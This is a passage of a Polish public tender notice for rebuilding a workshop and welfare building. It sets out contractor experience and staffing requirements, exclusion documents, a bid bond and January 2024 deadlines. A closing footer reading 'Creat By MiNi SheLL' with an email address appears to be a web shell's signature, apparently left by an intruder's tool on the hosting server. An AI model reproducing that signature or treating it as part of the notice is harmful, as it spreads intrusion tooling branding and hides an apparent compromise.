niż 1 miesiąc przed upływem terminu składania ofert.<br/>4) zdolności technicznej lub zawodowej:<br/>a. W zakresie doświadczenia: Wykonawca spełni ten warunek, jeżeli wykaże, że wykonał należycie w okresie ostatnich<br/>pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, minimum<br/>jedną robotę budowlaną porównywalną do udzielanego zamówienia obejmującą swoim<br/>zakresem prace związane z remontem lub przebudową budynków na kwotę min. 300 000,00<br/>zł.<br/>b. W zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia:<br/>Wykonawca spełni ten warunek jeśli wykaże, że dysponuje osobą, która będzie pełnić<br/>funkcje kierownika budowy – tj. osobą posiadająca uprawnienia budowlane do<br/>kierowaniem robotami budowlanymi bez ograniczeń w specjalności konstrukcyjnobudowlanej. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, warunek<br/>udziału w postępowaniu w zakresie doświadczenia musi spełniać samodzielnie<br/>przynajmniej jeden z Wykonawców (członków konsorcjum), który wykona roboty<br/>budowlane, do realizacji których te zdolności są wymagane. Powyższe zapisy stosuje<br/>się odpowiednio w przypadku powoływania się na zasoby podmiotu trzeciego.<br/>Niedozwolone jest łączenie doświadczenia Wykonawcy oraz podmiotu trzeciego w celu<br/>wykazania spełniania warunku doświadczenia.<br/>Wykonawca, powołując się na doświadczenie konsorcjum, którego był członkiem, musi<br/>wykazać, że jako uczestnik konsorcjum nabył doświadczenie wymagane przez<br/>Zamawiającego. Wykonawca nie może polegać na doświadczeniu grupy Wykonawców,<br/>jeżeli faktycznie nie uczestniczył w realizacji wymaganego przez Zamawiającego<br/>zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W zakresie niepodlegania wykluczeniu:<br/>a)oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym<br/>mowa w art. 125 ust. 1 PZP w zakresie podstaw wykluczenia z postępowania określonych<br/>w:<br/>a) art. 108 ust. 1 pkt 3 ustawy Pzp,<br/>b) art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o<br/>zamówienie publiczne tytułem środka zapobiegawczego,<br/>c) art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi wykonawcami<br/>porozumienia mającego na celu zakłócenie konkurencji,<br/>d) art. 108 ust. 1 pkt 6 ustawy Pzp,<br/>e) art. 109 ust.1 pkt 7 ustawy Pzp.<br/>(wzór oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o<br/>którym mowa w art. 125 ust. 1 PZP w zakresie podstaw wykluczenia z postępowania<br/>stanowi załącznik nr 9 do SWZ)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W zakresie spełniania warunków udziału w postępowaniu:<br/>1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat,<br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których<br/>roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty<br/>budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty<br/>budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego<br/>nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – wg<br/>załącznika nr 7 do SWZ<br/>2) wykaz osób – wg załącznika nr 8 do SWZ<br/>3) Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą<br/>wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w<br/>okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem,<br/>Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganych przez<br/>Zamawiającego podmiotowych środków dowodowych, o których mowa w pkt 3)<br/>wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób<br/>potwierdzają spełnianie opisanego przez zamawiającego warunku udziału w<br/>postępowaniu dotyczącego sytuacji finansowej 4) informację z Krajowego Rejestru Karnego w zakresie:(a) art. 108 ust. 1 pkt 1 i 2<br/>PZP,(b) art. 108 ust. 1 pkt 4 PZP, odnośnie do orzeczenia zakazu ubiegania się o<br/>zamówienie publiczne tytułem środka karnego,<br/>5) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5) ustawy Pzp, o braku<br/>przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego<br/>2007 r. o ochronie konkurencji i konsumentów (tekst jedn. Dz. U. z 2021 r., poz. 275<br/>z późn. zm.), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenie o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy<br/>należącego do tej samej grupy kapitałowej (wzór oświadczenia Wykonawcy w<br/>zakresie art. 108 ust. 1 pkt 5) ustawy Pzp o przynależności lub braku przynależności<br/>do tej grupy kapitałowej stanowi załącznik nr 3c do SWZ),<br/>6) odpis lub informacje z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) PZP,<br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne<br/>przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości: 18200,00 zł.<br/>Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać<br/>nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o<br/>których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku<br/>następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości (tekst jedn.: Dz. U. z 2020 r. poz. 299 z późn. zm.).<br/>3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy<br/>Zamawiającego w banku BNP Paribas Bank Polska S.A. nr rachunku: 38 2030 0045<br/>1110 0000 0159 4780 z dopiskiem: wadium na zabezpieczenie oferty w postępowaniu<br/>na „Przebudowa i remont budynku warsztatowo-socjalnego o nr inw. 103/602 – IV<br/>postępowanie” Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym<br/>terminie zostanie zaliczone na rachunku bankowym Zamawiającego. Wadium<br/>wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>4. Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji<br/>ubezpieczeniowej lub poręczeniach udzielonych przez podmioty, o których mowa w<br/>art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji<br/>Rozwoju Przedsiębiorczości powinno wynikać bezwarunkowe, na pierwsze pisemne<br/>żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie<br/>gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach<br/>określonych w art. 98 ust. 6 PZP. 5. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 2. ppkt<br/>2)-4) należy przekazać Zamawiającemu wraz z Ofertą w oryginale w postaci<br/>elektronicznej tj. opatrzonej kwalifikowanym podpisem elektronicznymi osób<br/>upoważnionych do jego wystawienia. Wadium musi zabezpieczać ofertę na daną część<br/>zamówienia przez cały okres związania ofertą. Oferta Wykonawcy, który nie wniesie<br/>wadium lub wniesie wadium w sposób nieprawidłowy, lub nie będzie utrzymywał<br/>wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot<br/>wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie odrzucona z<br/>postępowania na podstawie art. 226 ust. 1 pkt 14 PZP.<br/>6. Treść wadium wnoszonego w formie gwarancji lub poręczenia, o których mowa w pkt<br/>2. ppkt 2)-4) SWZ musi zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia<br/>(Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających<br/>gwarancji/poręczenia) oraz wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem –<br/>określenie przedmiotu zamówienia,<br/>3) kwotę gwarancji/poręczenia,<br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie<br/>kwoty gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego w<br/>okolicznościach określonych w art. 98 ust. 6 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1) każdy Wykonawca, w celu potwierdzenia, że nie podlega wykluczeniu oraz spełnia<br/>warunki udziału w postępowaniu, zobowiązany jest złożyć oddzielnie oświadczenia,<br/>o których mowa w ust.1;<br/>2) należy złożyć oświadczenie dotyczące realizacji zakresu przedmiotu zamówienia przez<br/>poszczególnych Wykonawców – na lub zgodnie z zał. Nr 3a do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Przewidziane są w załączniku nr 4 do SWZ - Projekt umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-01-15 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem platformy eZamawiający - https://zamowienia.pila.lasy.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-01-15 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-02-13</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com